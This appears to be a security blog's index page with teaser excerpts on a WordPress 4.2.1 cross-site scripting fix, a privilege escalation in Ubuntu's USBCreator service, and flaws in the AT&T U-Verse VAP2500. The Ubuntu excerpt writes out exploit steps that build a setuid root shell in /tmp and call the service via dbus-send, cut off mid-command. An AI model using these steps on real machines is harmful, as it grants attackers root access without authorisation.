Update your WordPress

WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen. It allows an attacker to inject code into the HTML content received by administrators who maintain the website. Recommended that you update to WordPress 4.2.1.

Read More

Priv Escalation in Ubuntu USBCreator service

On Ubuntu and need to escalate to root and don’t have sudo?

$ cat test.c
void __attribute__((constructor)) init (void)
chown(“/tmp/test”, 0, 0);
chmod(“/tmp/test”, 04755);
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send –print-reply –system –dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu...

Read More

ATT U-Verse VAP2500 vulns

ATT U-Verse service includes the VAP2500 video access point as part of the installation,. From their guide “The VAP2500 enables you to transmit multiple standard- and high-definition video streams throughout your home wirelessly. You can enjoy a full range of video services and applications without having to run wires, lay cables, or drill holes...

Read More